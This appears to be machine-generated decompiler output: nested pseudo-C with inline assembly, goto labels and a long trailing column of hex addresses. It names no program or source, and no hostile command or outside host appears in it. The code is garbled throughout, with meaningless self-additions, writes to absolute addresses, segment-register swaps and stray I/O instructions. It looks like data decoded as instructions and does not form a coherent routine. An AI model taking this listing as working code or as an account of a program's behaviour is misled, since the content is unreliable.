								 *_t319 =  *_t319 + _t319;
								_t321 = (_t319 |  *_t319) + 0x6f;
								_pop(_t554);
								 *_t321 =  *_t321 + _t321;
								_t490 = _t488 |  *_t488 |  *_t694;
								asm("sbb [edi], bl");
								ds = ss;
								asm("sbb [eax], ch");
								_pop(_t708);
								 *_t321 =  *_t321 + _t321;
								_t660 = _t658 |  *(_t490 + 0x5e);
								 *_t321 =  *_t321 + _t321;
								_t491 = _t490 |  *_t321;
								asm("sbb [edx], al");
								 *_t660 =  *_t660 - _t491;
								 *_t660 =  *_t660 + _t554;
								asm("sbb bl, dl");
								_pop(ds);
								 *_t321 =  *_t321 + _t321;
								 *_t321 =  *_t321 + _t321;
								_t323 = (_t321 |  *_t321) + 0x6f;
								_pop(_t556);
								 *_t323 =  *_t323 + _t323;
								_t492 = _t491 |  *_t694;
								 *_t323 =  *_t323 + _t323;
								_t662 = _t660 ^  *(_t491 + 0x5c) |  *(_t492 + 0x5f);
								 *_t323 =  *_t323 + _t323;
								_t493 = _t492 |  *_t323;
								_pop(ds);
								 *_t323 =  *_t323 + _t323;
								_t324 = _t323 |  *_t662;
								 *_t662 =  *_t662 - _t493;
								 *_t662 =  *_t662 + _t556;
								asm("sbb bl, dl");
								_pop(ds);
								_t703 = _t700 ^  *(_t493 - 0x70) ^  *(_t493 - 0x70);
								 *_t324 =  *_t324 + _t324;
								 *_t324 =  *_t324 + _t324;
								_t326 = (_t324 |  *_t324) + 0x6f;
								_pop(_t558);
								 *_t326 =  *_t326 + _t326;
								_t495 = (_t493 |  *_t694) -  *_t694;
								 *_t694 =  *_t694 - _t495;
								 *_t326 =  *_t326 - _t708;
								_pop(_t709);
								 *_t326 =  *_t326 + _t326;
								_t663 = _t662 |  *(_t495 + 0x5f);
								 *_t326 =  *_t326 + _t326;
								_t496 = _t495 |  *_t326;
								_pop(ds);
								_t327 = _t326 ^ 0x00000073;
								 *_t327 =  *_t327 + _t327;
								 *_t663 =  *_t663 - _t496;
								 *_t663 =  *_t663 + _t558;
								asm("sbb bl, dl");
								_pop(ds);
								_t329 = (_t327 |  *_t663) ^ 0x00000073;
								 *_t329 =  *_t329 + _t329;
								 *_t329 =  *_t329 + _t329;
								_t330 = _t329 |  *_t329;
								asm("adc al, [eax]");
								asm("sbb [eax], bl");
								_pop(_t664);
								 *_t330 =  *_t330 + _t330;
								_t497 = _t496 |  *_t664;
								asm("ficomp dword [edi]");
								_pop(ss);
								 *((intOrPtr*)(_t330 + _t330)) =  *((intOrPtr*)(_t330 + _t330)) - _t497;
								_t561 = (_t558 |  *(_t694 - 0x5e)) +  *_t330 |  *_t664;
								 *_t330 =  *_t330 + _t330;
								 *_t497 =  *_t497 + _t664;
								 *0x5700 =  *0x5700 ^ _t330;
								 *0x110000 =  *0x110000 + _t561;
								asm("adc al, [eax]");
								_push(ss);
								_t665 = ss;
								 *_t330 =  *_t330 + _t330;
								_t498 = _t497 |  *_t694;
								 *_t330 =  *_t330 + _t330;
								 *_t498 =  *_t498 + _t330;
								asm("outsd");
								asm("insd");
								 *_t330 =  *_t330 + _t330;
								_t331 = _t330 |  *_t498;
								asm("outsd");
								asm("outsb");
								 *_t331 =  *_t331 + _t331;
								_t667 = _t665 |  *_t665 |  *(_t498 - 0x70);
								 *_t331 =  *_t331 + _t331;
								_t564 = _t561 +  *_t330 ^  *_t330 |  *_t331;
								 *_t667 =  *_t667 + _t564;
								_t334 =  *_t694 - 0x1f;
								_t668 = _t667 +  *_t694;
								if(_t668 >= 0) {
									L125:
									asm("outsb");
									 *_t334 =  *_t334 + _t334;
									_t499 = _t498 |  *(_t709 + 0x58);
									 *_t334 =  *_t334 + _t334;
									_t335 = _t334 + 2;
									if(_t335 == 0) {
										 *_t335 =  *_t335 + _t335;
										_push(es);
										_t366 = _t335 + 0xa - 0x45 +  *_t499;
										asm("outsd");
										 *_t668 =  *_t668 + _t564;
										 *((intOrPtr*)(_t564 + 0xb0a0000)) =  *((intOrPtr*)(_t564 + 0xb0a0000)) - _t564;
										_t564 = _t564 +  *_t366;
										_t367 = _t366;
										 *_t367 =  *_t367 + _t367;
										_t668 = _t668 |  *_t668;
										 *_t367 =  *_t367 + _t709;
										if ( *_t367 >= 0) goto L127;
										goto L127;
									}
								} else {
									 *_t334 =  *_t334 + _t334;
									_t369 = _t334 + 2;
									_t710 = _t709 + _t694[0x1b];
									 *_t369 =  *_t369 + _t369;
									_t370 = _t369 |  *_t498;
									asm("outsd");
									asm("outsb");
									 *_t370 =  *_t370 + _t370;
									_t668 = _t668 |  *(_t498 - 0x70);
									 *_t370 =  *_t370 + _t370;
									_t499 = _t498 |  *(_t710 + 0x55);
									 *_t370 =  *_t370 + _t370;
									_t367 = _t370;
									 *_t668 =  *_t668 + _t367;
									_t709 = _t710 +  *_t367;
									if (_t709 >= 0) goto L121;
									 *_t668 =  *_t668 + _t564;
									 *_t668 =  *_t668 + _t564;
									_t703 = _t703 + 1;
									 *_t668 =  *_t668 + _t367;
									_push(ss);
									if( *_t668 >= 0) {
										L127:
										 *_t668 =  *_t668 + _t564;
										_t501 = _t499 +  *((intOrPtr*)(_t709 + _t668 * 2));
										_t232 = _t367 + _t709;
										 *_t232 =  *((intOrPtr*)(_t367 + _t709)) + _t367;
										if ( *_t232 >= 0) goto L128;
										 *_t668 =  *_t668 + _t564;
										asm("ficom dword [edx]");
										 *_t367 =  *_t367 + _t709;
										if ( *_t367 <= 0) goto L129;
										 *_t668 =  *_t668 + _t564;
										_t499 = _t501 +  *((intOrPtr*)(_t709 + _t668 * 2));
										_t236 = _t367 + _t709;
										 *_t236 =  *((intOrPtr*)(_t367 + _t709)) + _t367;
										if ( *_t236 <= 0) goto L130;
										 *_t668 =  *_t668 + _t564;
										asm("fidiv dword [ebx-0x70]");
										 *_t367 =  *_t367 + _t367;
										_t564 = _t564 |  *(_t694 - 0x56);
										 *_t367 =  *_t367 + _t367;
										_t368 = _t367 |  *_t367;
										 *_t368 =  *_t368 + _t368;
										_t335 = _t368 +  *_t499;
										 *_t499 =  *_t499 - _t668;
										 *_t668 =  *_t668 + _t564;
										 *_t668 =  *_t668 + _t335;
									} else {
										 *_t367 =  *_t367 + _t367;
										_t371 = _t367 + 2;
										_t711 = _t709 +  *_t371;
										if (_t711 < 0) goto L123;
										 *_t668 =  *_t668 + _t564;
										 *_t668 =  *_t668 + _t564;
										 *_t371 =  *_t371 + _t371;
										 *_t499 =  *_t499 + _t668;
										_t221 = _t371 + _t371;
										 *_t221 =  *(_t371 + _t371) ^ _t371;
										if ( *_t221 >= 0) goto L124;
										 *_t371 =  *_t371 + _t371;
										 *[cs:eax] =  *[cs:eax] + _t371;
										asm("adc [eax], eax");
										_t372 = _t371 +  *_t499;
										asm("outsd");
										asm("insd");
										 *_t372 =  *_t372 + _t372;
										_t498 = _t499 |  *(_t711 + 0x57);
										 *_t372 =  *_t372 + _t372;
										_t334 = _t372 + 2;
										_t709 = _t711 + _t694[0x1b];
										goto L125;
									}
								}
								 *((intOrPtr*)(_t335 + _t335)) =  *((intOrPtr*)(_t335 + _t335)) - _t668;
								_t337 = (_t335 |  *_t335) -  *(_t335 |  *_t335);
								 *_t337 =  *_t337 + _t337;
								asm("adc esi, [eax]");
								 *((intOrPtr*)(_t337 + 0x2f000000)) =  *((intOrPtr*)(_t337 + 0x2f000000)) + _t337;
								 *_t337 =  *_t337 + _t337;
								asm("adc [eax], eax");
								 *(_t337 + 0x20000000) =  *(_t337 + 0x20000000) & _t337;
								 *_t337 =  *_t337;
								 *((intOrPtr*)(_t499 - 0x2d)) =  *((intOrPtr*)(_t499 - 0x2d)) + _t668;
								 *_t337 =  *_t337 + _t337;
								_t565 = _t564 |  *_t499;
								 *(_t337 + 0x73000000) =  *(_t337 + 0x73000000) & _t337;
								asm("aam 0x0");
								 *_t668 =  *_t668 + _t565;
								asm("outsd");
								asm("aad 0x0");
								 *_t668 =  *_t668 + _t565;
								ss = es;
								asm("ficom dword [ebx]");
								_t339 = (_t337 | 0x00000007) + 0x16;
								asm("adc eax, [0x6f073b2b]");
								asm("salc");
								 *_t339 =  *_t339 + _t339;
								_t669 = _t668 |  *_t694;
								asm("ficom dword [ebx]");
								_push(es);
								asm("adc eax, [edi]");
								es = ss;
								asm("adc [0x8030711], eax");
								_t566 = _t565 +  *((intOrPtr*)(_t703 + 0xd76f69));
								 *_t669 =  *_t669 + _t566;
								do {
									_t339 = _t339 |  *(_t499 + 0x1000045);
									asm("outsd");
									_t839 = _t839 +  *_t339;
									 *_t669 =  *_t669 + _t566;
									 *_t566 =  *_t566 + _t669;
									_pop(es);
									_pop(ss);
									asm("salc");
									asm("adc eax, [edi]");
									asm("adc [edi], eax");
									asm("adc [esi], eax");
									_t669 = _t669 ^ _t499;
									asm("adc [0x513d617], eax");
									asm("adc [0xbf310411], eax");
									_pop(es);
								} while (_t669 >= 0);
								 *_t339 =  *_t339 + _t339;
								_t567 = _t566 |  *0xda6f07;
								 *_t669 =  *_t669 + _t567;
								 *_t567 =  *_t567 + _t567;
								_t568 = _t567 |  *_t499;
								 *_t703 =  *_t703 + _t339;
								_t670 = _t669 -  *_t499;
								 *_t568 =  *_t568 ^ _t339;
								 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t568;
								 *_t339 =  *_t339 + _t339;
								 *_t339 =  *_t339 ^ _t339;
								 *_t568 =  *_t568 + _t670;
								 *_t670 =  *_t670 + _t339;
								if( *_t670 != 0) {
									L137:
									_t340 = _t339 -  *_t339;
									 *_t499 =  *_t499 + _t670;
									 *_t568 =  *_t568 ^ _t340;
									 *((intOrPtr*)(_t340 + _t340)) =  *((intOrPtr*)(_t340 + _t340)) + _t568;
									 *_t340 =  *_t340 + _t340;
									 *_t340 =  *_t340 | _t340;
									 *_t568 =  *_t568 + _t670;
									 *_t670 =  *_t670 + _t340;
									if( *_t670 == 0) {
										 *_t340 =  *_t340 + _t340;
										_push(es);
										_t343 = _t340 + 0xa -  *((intOrPtr*)(_t340 + 0xa)) -  *_t703;
										 *_t670 =  *_t670 + _t343;
										_t695 = _t694 +  *((intOrPtr*)(_t709 + 0x5c));
										 *_t343 =  *_t343 + _t343;
										_t344 = _t343 + 0x2a;
										goto L139;
									}
								} else {
									 *_t339 =  *_t339 + _t339;
									_push(es);
									_t355 = _t339 + 0xa -  *((intOrPtr*)(_t339 + 0xa)) -  *_t703;
									 *_t670 =  *_t670 + _t355;
									_t695 = _t694 +  *((intOrPtr*)(_t709 + 0x59));
									 *_t355 =  *_t355 + _t355;
									_t356 = _t355 + 0x2a;
									 *_t356 =  *_t356 + _t356;
									asm("adc esi, [eax]");
									 *_t356 =  *_t356 + _t356;
									_t344 = _t356;
									 *_t344 =  *_t344 + _t344;
									 *_t344 =  *_t344 ^ _t344;
									 *_t568 =  *_t568 + _t670;
									 *_t670 =  *_t670 + _t344;
									if( *_t670 != 0) {
										L139:
										 *_t344 =  *_t344 + _t344;
										asm("adc esi, [eax]");
										 *_t344 =  *_t344 + _t344;
										_t345 = _t344;
										 *_t345 =  *_t345 + _t345;
										asm("sbb eax, 0x110000");
										_t499 = _t499 +  *((intOrPtr*)(_t499 + 0x5d));
										 *_t345 =  *_t345 + _t345;
										_push(es);
										_t348 = _t345 + 0xa -  *((intOrPtr*)(_t345 + 0xa)) -  *_t703;
										 *_t670 =  *_t670 + _t348;
										_t696 = _t695 +  *((intOrPtr*)(_t709 + 0x5d));
										 *_t348 =  *_t348 + _t348;
										_t349 = _t348 + 0x2a;
										 *_t349 =  *_t349 + _t349;
										goto L140;
									} else {
										 *_t344 =  *_t344 + _t344;
										_push(es);
										_t359 = _t344 + 0xa -  *((intOrPtr*)(_t344 + 0xa)) -  *_t703;
										 *_t670 =  *_t670 + _t359;
										_t696 = _t695 +  *((intOrPtr*)(_t709 + 0x5a));
										 *_t359 =  *_t359 + _t359;
										_t360 = _t359 + 0x2a;
										 *_t360 =  *_t360 + _t360;
										asm("adc esi, [eax]");
										 *_t360 =  *_t360 + _t360;
										_t349 = _t360;
										 *_t349 =  *_t349 + _t349;
										 *_t349 =  *_t349 ^ _t349;
										 *_t568 =  *_t568 + _t670;
										 *_t670 =  *_t670 + _t349;
										if( *_t670 != 0) {
											L140:
											 *_t499 =  *_t499 + _t670;
											 *_t568 =  *_t568 ^ _t349;
											 *((intOrPtr*)(_t349 + _t349)) =  *((intOrPtr*)(_t349 + _t349)) + _t568;
											 *_t349 =  *_t349 + _t349;
											asm("sbb eax, 0x110000");
											 *_t349 =  *_t349 + _t349;
											_push(es);
											_t352 = _t349 + 0xa -  *((intOrPtr*)(_t349 + 0xa)) -  *_t703;
											 *_t670 =  *_t670 + _t352;
											 *_t352 =  *_t352 + _t352;
											_t340 = _t352 + 0x2a;
											 *_t340 =  *_t340 + _t340;
										} else {
											 *_t349 =  *_t349 + _t349;
											_push(es);
											_t363 = _t349 + 0xa -  *((intOrPtr*)(_t349 + 0xa)) -  *_t703;
											 *_t670 =  *_t670 + _t363;
											_t694 = _t696 +  *((intOrPtr*)(_t709 + 0x5b));
											 *_t363 =  *_t363 + _t363;
											_t339 = _t363 + 0x2a;
											goto L137;
										}
									}
								}
								asm("adc esi, [eax]");
								 *_t340 =  *_t340 | _t340;
								return _t340;
							} else {
								 *_t319 =  *_t319 + _t319;
								_t314 = _t319 + 2;
								_pop(ss);
								asm("outsd");
								goto L117;
							}
						}
					}
				}
			}




























































































































































































































































































                                    0x006a6507
                                    0x006a6507
                                    0x006a6507
                                    0x006a6507
                                    0x006a6508
                                    0x006a650a
                                    0x006a6512
                                    0x006a6514
                                    0x006a6516
                                    0x006a6518
                                    0x006a651b
                                    0x006a651c
                                    0x006a651f
                                    0x006a6523
                                    0x006a6525
                                    0x006a6526
                                    0x006a6528
                                    0x006a652a
                                    0x006a652c
                                    0x006a652f
                                    0x006a6530
                                    0x006a6533
                                    0x006a6535
                                    0x006a6538
                                    0x006a653a
                                    0x006a653c
                                    0x006a653e
                                    0x006a6540
                                    0x006a6542
                                    0x006a6544
                                    0x006a654a
                                    0x006a654c
                                    0x006a6552
                                    0x006a6554
                                    0x006a6557
                                    0x006a655b
                                    0x006a655d
                                    0x006a655e
                                    0x006a6560
                                    0x006a6562
                                    0x006a6564
                                    0x006a6566
                                    0x006a656c
                                    0x006a6572
                                    0x006a6578
                                    0x006a657c
                                    0x006a657d
                                    0x006a6581
                                    0x006a6582
                                    0x006a6584
                                    0x006a6586
                                    0x006a6589
                                    0x006a658d
                                    0x006a6591
                                    0x006a6597
                                    0x006a659c
                                    0x006a65a0
                                    0x006a65a2
                                    0x006a65a3
                                    0x006a65a5
                                    0x006a65a5
                                    0x006a65a6
                                    0x006a65a8
                                    0x006a65aa
                                    0x006a65ac
                                    0x006a65ae
                                    0x006a65b4
                                    0x006a65b8
                                    0x006a65b9
                                    0x006a65bd
                                    0x006a65be
                                    0x006a65c2
                                    0x006a65c5
                                    0x006a65ca
                                    0x006a65ce
                                    0x006a65d0
                                    0x006a65d1
                                    0x006a65d3
                                    0x006a65d5
                                    0x006a65db
                                    0x006a65dc
                                    0x006a65e2
                                    0x006a65e6
                                    0x006a65e7
                                    0x006a65eb
                                    0x006a65ec
                                    0x006a65ee
                                    0x006a65f2
                                    0x006a65f7
                                    0x006a65fb
                                    0x006a65fd
                                    0x006a65fe
                                    0x006a6600
                                    0x006a6602
                                    0x006a6609
                                    0x006a660b
                                    0x006a660f
                                    0x006a6613
                                    0x006a6614
                                    0x006a6618
                                    0x006a6619
                                    0x006a661d
                                    0x006a661e
                                    0x006a6620
                                    0x006a6625
                                    0x006a6629
                                    0x006a662c
                                    0x006a662e
                                    0x006a6630
                                    0x006a6636
                                    0x006a6637
                                    0x006a6639
                                    0x006a663e
                                    0x006a6640
                                    0x006a6642
                                    0x006a6648
                                    0x006a6649
                                    0x006a664d
                                    0x006a664e
                                    0x006a6652
                                    0x006a6655
                                    0x006a665a
                                    0x006a665e
                                    0x006a6661
                                    0x006a6663
                                    0x006a6665
                                    0x006a666c
                                    0x006a666e
                                    0x006a6673
                                    0x006a6675
                                    0x006a6677
                                    0x006a6677
                                    0x006a667c
                                    0x006a667e
                                    0x006a6682
                                    0x006a6683
                                    0x006a6688
                                    0x006a6689
                                    0x006a668e
                                    0x006a6692
                                    0x006a6694
                                    0x006a6695
                                    0x006a6697
                                    0x006a6697
                                    0x006a6699
                                    0x006a669f
                                    0x006a66a0
                                    0x006a66a2
                                    0x006a66a6
                                    0x006a66a7
                                    0x006a66a9
                                    0x006a66ab
                                    0x006a66b1
                                    0x006a66b2
                                    0x006a66b4
                                    0x006a66b6
                                    0x006a66b7
                                    0x006a66b9
                                    0x006a66bb
                                    0x006a66bc
                                    0x00000000
                                    0x00000000
                                    0x006a66be
                                    0x006a66c0
                                    0x006a66c3
                                    0x006a66c5
                                    0x006a66c7
                                    0x006a66cb
                                    0x006a66cd
                                    0x006a66d2
                                    0x006a66d4
                                    0x006a66d9
                                    0x006a66db
                                    0x006a66e2
                                    0x006a66e3
                                    0x006a66e5
                                    0x006a66e6
                                    0x006a66e8
                                    0x006a66ea
                                    0x006a66eb
                                    0x006a66ed
                                    0x006a66f0
                                    0x006a66f2
                                    0x006a66f9
                                    0x006a66fb
                                    0x006a66fe
                                    0x006a6700
                                    0x006a6701
                                    0x006a6702
                                    0x006a6704
                                    0x006a6705
                                    0x00000000
                                    0x006a6707
                                    0x006a6707
                                    0x006a6709
                                    0x006a6710
                                    0x006a6712
                                    0x006a6715
                                    0x006a6717
                                    0x006a6718
                                    0x006a6719
                                    0x006a6719
                                    0x00000000
                                    0x006a6705
                                    0x006a671a
                                    0x006a671b
                                    0x006a671e
                                    0x006a6720
                                    0x006a6727
                                    0x006a6729
                                    0x006a672c
                                    0x006a672e
                                    0x006a672f
                                    0x006a6732
                                    0x006a6734
                                    0x006a673b
                                    0x006a673d
                                    0x006a6740
                                    0x006a6742
                                    0x006a6743
                                    0x006a6746
                                    0x006a674f
                                    0x006a6751
                                    0x006a6752
                                    0x006a6753
                                    0x006a6755
                                    0x006a6757
                                    0x006a675d
                                    0x006a675e
                                    0x006a6760
                                    0x006a6762
                                    0x006a6764
                                    0x006a6766
                                    0x006a6768
                                    0x006a676a
                                    0x006a6770
                                    0x006a6772
                                    0x006a6774
                                    0x006a677d
                                    0x006a677e
                                    0x006a6780
                                    0x006a6782
                                    0x006a6784
                                    0x006a6786
                                    0x006a6788
                                    0x006a6789
                                    0x006a678b
                                    0x006a678d
                                    0x006a678f
                                    0x006a6790
                                    0x006a6795
                                    0x006a67f3
                                    0x006a67f3
                                    0x006a67f6
                                    0x00000000
                                    0x006a6797
                                    0x006a6797
                                    0x006a679c
                                    0x006a67a0
                                    0x006a67a2
                                    0x006a67a3
                                    0x006a67a7
                                    0x006a67a7
                                    0x006a67a8
                                    0x006a67ac
                                    0x006a67af
                                    0x006a67b1
                                    0x006a67b2
                                    0x006a67b4
                                    0x006a67b5
                                    0x006a67b7
                                    0x006a67b9
                                    0x006a67bc
                                    0x006a67c1
                                    0x006a67c5
                                    0x006a67c7
                                    0x006a67c8
                                    0x006a67ca
                                    0x006a67cd
                                    0x006a67cf
                                    0x006a6843
                                    0x006a6845
                                    0x006a6847
                                    0x006a6848
                                    0x006a684c
                                    0x006a684c
                                    0x006a684d
                                    0x006a6851
                                    0x006a6854
                                    0x006a6856
                                    0x006a6857
                                    0x006a6859
                                    0x006a685a
                                    0x006a685c
                                    0x006a685e
                                    0x006a6861
                                    0x00000000
                                    0x006a67d1
                                    0x006a67d1
                                    0x006a67d2
                                    0x006a67d4
                                    0x006a67f8
                                    0x006a67f8
                                    0x006a67fa
                                    0x006a67fc
                                    0x006a67fe
                                    0x006a6864
                                    0x006a6864
                                    0x006a6865
                                    0x006a6866
                                    0x006a686a
                                    0x006a686c
                                    0x006a686d
                                    0x006a686f
                                    0x006a6872
                                    0x006a6874
                                    0x00000000
                                    0x006a6876
                                    0x006a6876
                                    0x006a6877
                                    0x006a6879
                                    0x00000000
                                    0x006a687b
                                    0x006a687b
                                    0x006a687d
                                    0x006a687d
                                    0x006a6880
                                    0x00000000
                                    0x006a6882
                                    0x006a6882
                                    0x006a6884
                                    0x006a6886
                                    0x006a6887
                                    0x006a6889
                                    0x006a688b
                                    0x006a688e
                                    0x006a6890
                                    0x006a6891
                                    0x006a6893
                                    0x006a6894
                                    0x006a6896
                                    0x00000000
                                    0x006a6896
                                    0x006a6880
                                    0x006a6879
                                    0x006a6800
                                    0x006a6800
                                    0x006a6802
                                    0x006a6808
                                    0x006a680a
                                    0x006a6810
                                    0x006a6812
                                    0x006a6815
                                    0x006a6817
                                    0x006a6819
                                    0x006a681b
                                    0x006a681d
                                    0x006a681f
                                    0x006a6822
                                    0x006a6823
                                    0x006a6825
                                    0x006a6827
                                    0x006a6829
                                    0x006a682b
                                    0x006a682d
                                    0x006a682e
                                    0x006a6830
                                    0x006a6832
                                    0x006a6834
                                    0x006a6835
                                    0x006a683a
                                    0x006a6898
                                    0x006a6898
                                    0x006a689b
                                    0x006a689d
                                    0x006a689d
                                    0x006a689f
                                    0x006a68a1
                                    0x006a68a1
                                    0x006a68a3
                                    0x006a6909
                                    0x006a6909
                                    0x006a690b
                                    0x006a690d
                                    0x006a690f
                                    0x006a6910
                                    0x006a6912
                                    0x006a6914
                                    0x006a6916
                                    0x006a6917
                                    0x006a691c
                                    0x00000000
                                    0x006a691e
                                    0x006a691e
                                    0x006a6923
                                    0x006a6927
                                    0x006a6929
                                    0x006a692a
                                    0x006a692c
                                    0x006a692e
                                    0x006a692e
                                    0x006a692f
                                    0x006a6933
                                    0x006a6936
                                    0x006a6938
                                    0x006a6939
                                    0x006a693b
                                    0x006a693c
                                    0x006a693e
                                    0x006a6940
                                    0x00000000
                                    0x006a6940
                                    0x006a68a5
                                    0x006a68a5
                                    0x006a68a7
                                    0x006a68ad
                                    0x006a68af
                                    0x006a68b5
                                    0x006a68b7
                                    0x006a68ba
                                    0x006a68be
                                    0x006a68c0
                                    0x006a68c1
                                    0x006a68c3
                                    0x006a68c8
                                    0x006a68ca
                                    0x006a68cc
                                    0x006a68cf
                                    0x006a68d2
                                    0x006a68d6
                                    0x006a68d9
                                    0x006a68db
                                    0x006a68dc
                                    0x006a68de
                                    0x006a68df
                                    0x006a68e1
                                    0x006a68e3
                                    0x006a68e4
                                    0x006a68e4
                                    0x006a6942
                                    0x006a6943
                                    0x006a6948
                                    0x006a694c
                                    0x006a694e
                                    0x006a694f
                                    0x006a6951
                                    0x006a6954
                                    0x006a6956
                                    0x006a69ca
                                    0x006a69cc
                                    0x006a69cf
                                    0x006a69d3
                                    0x006a69d3
                                    0x006a69d4
                                    0x006a69d6
                                    0x006a69d8
                                    0x006a69d9
                                    0x006a69da
                                    0x006a69dc
                                    0x006a69de
                                    0x006a69e0
                                    0x006a69e1
                                    0x006a69e3
                                    0x006a69e5
                                    0x006a69e8
                                    0x00000000
                                    0x006a6958
                                    0x006a6958
                                    0x006a6959
                                    0x006a695b
                                    0x006a697f
                                    0x006a6981
                                    0x006a6983
                                    0x006a6985
                                    0x006a69eb
                                    0x006a69eb
                                    0x006a69ec
                                    0x006a69ed
                                    0x006a69f1
                                    0x006a69f3
                                    0x006a69f4
                                    0x006a69f6
                                    0x006a69f9
                                    0x006a69fb
                                    0x006a6a6f
                                    0x006a6a6f
                                    0x006a6a72
                                    0x006a6a74
                                    0x006a6a76
                                    0x006a6a78
                                    0x006a6a7e
                                    0x006a6a80
                                    0x006a6a86
                                    0x006a6a88
                                    0x006a6a8b
                                    0x006a6a8c
                                    0x006a6a8e
                                    0x00000000
                                    0x006a69fd
                                    0x006a69fd
                                    0x006a69fe
                                    0x006a6a00
                                    0x006a6a24
                                    0x006a6a26
                                    0x006a6a28
                                    0x006a6a28
                                    0x006a6a2a
                                    0x006a6a90
                                    0x006a6a90
                                    0x006a6a92
                                    0x006a6a94
                                    0x006a6a96
                                    0x006a6a97
                                    0x006a6a99
                                    0x006a6a9d
                                    0x006a6a9e
                                    0x006a6aa3
                                    0x00000000
                                    0x006a6aa5
                                    0x006a6aa5
                                    0x006a6aaa
                                    0x006a6aae
                                    0x006a6ab0
                                    0x006a6ab1
                                    0x006a6ab3
                                    0x006a6ab5
                                    0x006a6ab5
                                    0x006a6ab6
                                    0x006a6aba
                                    0x006a6abd
                                    0x006a6abf
                                    0x006a6ac2
                                    0x006a6ac3
                                    0x006a6ac5
                                    0x006a6ac7
                                    0x00000000
                                    0x006a6ac7
                                    0x006a6a2c
                                    0x006a6a2c
                                    0x006a6a2e
                                    0x006a6a34
                                    0x006a6a36
                                    0x006a6a3c
                                    0x006a6a3e
                                    0x006a6a41
                                    0x006a6a45
                                    0x006a6a47
                                    0x006a6a48
                                    0x006a6a4a
                                    0x006a6a4f
                                    0x006a6a51
                                    0x006a6a53
                                    0x006a6a56
                                    0x006a6a59
                                    0x006a6a5d
                                    0x006a6a60
                                    0x006a6a62
                                    0x006a6a63
                                    0x006a6a65
                                    0x006a6a66
                                    0x006a6a68
                                    0x006a6a6a
                                    0x00000000
                                    0x006a6a6a
                                    0x006a6a02
                                    0x006a6a02
                                    0x006a6a04
                                    0x006a6a04
                                    0x006a6a07
                                    0x006a6a6b
                                    0x006a6a6b
                                    0x006a6ac9
                                    0x006a6aca
                                    0x006a6acf
                                    0x006a6ad3
                                    0x006a6ad5
                                    0x006a6ad6
                                    0x006a6ad8
                                    0x006a6adb
                                    0x006a6add
                                    0x006a6b51
                                    0x006a6b53
                                    0x006a6b56
                                    0x006a6b5a
                                    0x006a6b5a
                                    0x006a6b5b
                                    0x006a6b5d
                                    0x006a6b5f
                                    0x006a6b60
                                    0x006a6b61
                                    0x006a6b63
                                    0x006a6b67
                                    0x006a6b68
                                    0x006a6b6a
                                    0x006a6b6c
                                    0x006a6b6f
                                    0x00000000
                                    0x006a6adf
                                    0x006a6adf
                                    0x006a6ae0
                                    0x006a6ae2
                                    0x006a6b06
                                    0x006a6b08
                                    0x006a6b0a
                                    0x006a6b0c
                                    0x006a6b72
                                    0x006a6b72
                                    0x006a6b73
                                    0x006a6b74
                                    0x006a6b78
                                    0x006a6b7a
                                    0x006a6b7b
                                    0x006a6b7d
                                    0x006a6b80
                                    0x006a6b82
                                    0x006a6bf6
                                    0x006a6bf6
                                    0x006a6bf9
                                    0x006a6bfb
                                    0x006a6bfd
                                    0x006a6bff
                                    0x006a6c01
                                    0x006a6c05
                                    0x006a6c07
                                    0x006a6c09
                                    0x006a6c0b
                                    0x006a6c0d
                                    0x006a6c0f
                                    0x006a6c11
                                    0x006a6c13
                                    0x006a6c14
                                    0x006a6c16
                                    0x00000000
                                    0x006a6b84
                                    0x006a6b84
                                    0x006a6b85
                                    0x006a6b87
                                    0x006a6bab
                                    0x006a6bad
                                    0x006a6baf
                                    0x006a6bb1
                                    0x006a6c17
                                    0x006a6c17
                                    0x006a6c18
                                    0x006a6c19
                                    0x006a6c1b
                                    0x006a6c22
                                    0x006a6c26
                                    0x006a6c28
                                    0x006a6c29
                                    0x006a6c2a
                                    0x006a6c2c
                                    0x006a6c2e
                                    0x006a6c2f
                                    0x006a6c30
                                    0x006a6c32
                                    0x006a6c35
                                    0x006a6c37
                                    0x006a6c3b
                                    0x006a6c3f
                                    0x006a6c41
                                    0x006a6c43
                                    0x00000000
                                    0x006a6c45
                                    0x006a6c45
                                    0x006a6c47
                                    0x006a6c49
                                    0x006a6c4c
                                    0x006a6c4e
                                    0x00000000
                                    0x006a6c4e
                                    0x006a6bb3
                                    0x006a6bb3
                                    0x006a6bb5
                                    0x006a6bbb
                                    0x006a6bbd
                                    0x006a6bc3
                                    0x006a6bc5
                                    0x006a6bc8
                                    0x006a6bcc
                                    0x006a6bce
                                    0x006a6bcf
                                    0x006a6bd1
                                    0x006a6bd6
                                    0x006a6bd8
                                    0x006a6bda
                                    0x006a6bdd
                                    0x006a6be0
                                    0x006a6be2
                                    0x006a6be4
                                    0x006a6be7
                                    0x006a6be9
                                    0x006a6bea
                                    0x006a6bec
                                    0x006a6bed
                                    0x006a6bef
                                    0x006a6bf1
                                    0x00000000
                                    0x006a6bf1
                                    0x006a6b89
                                    0x006a6b89
                                    0x006a6b8b
                                    0x006a6b8b
                                    0x006a6b8e
                                    0x006a6bf2
                                    0x006a6bf2
                                    0x006a6c50
                                    0x006a6c50
                                    0x006a6c51
                                    0x006a6c52
                                    0x006a6c54
                                    0x006a6c57
                                    0x006a6c59
                                    0x006a6c5c
                                    0x006a6c5e
                                    0x006a6c60
                                    0x006a6c62
                                    0x006a6c63
                                    0x006a6c65
                                    0x006a6c67
                                    0x006a6c69
                                    0x006a6c6b
                                    0x006a6c6d
                                    0x006a6c72
                                    0x006a6c74
                                    0x006a6c76
                                    0x006a6c79
                                    0x006a6c7b
                                    0x006a6c7c
                                    0x006a6c7e
                                    0x006a6c7f
                                    0x006a6c84
                                    0x006a6ce2
                                    0x006a6ce2
                                    0x006a6ce4
                                    0x006a6ce6
                                    0x006a6ce8
                                    0x006a6cea
                                    0x006a6cec
                                    0x006a6cee
                                    0x006a6cf0
                                    0x006a6cf1
                                    0x006a6cf3
                                    0x006a6cf5
                                    0x006a6cf6
                                    0x006a6cf8
                                    0x006a6cfa
                                    0x006a6cfc
                                    0x006a6cfe
                                    0x006a6d00
                                    0x006a6d06
                                    0x006a6d07
                                    0x006a6d09
                                    0x006a6d0b
                                    0x006a6d0d
                                    0x006a6d0f
                                    0x006a6d11
                                    0x006a6d12
                                    0x006a6d14
                                    0x006a6c86
                                    0x006a6c86
                                    0x006a6c8c
                                    0x006a6c8e
                                    0x006a6c8f
                                    0x006a6c90
                                    0x006a6c92
                                    0x006a6c93
                                    0x006a6c93
                                    0x006a6c96
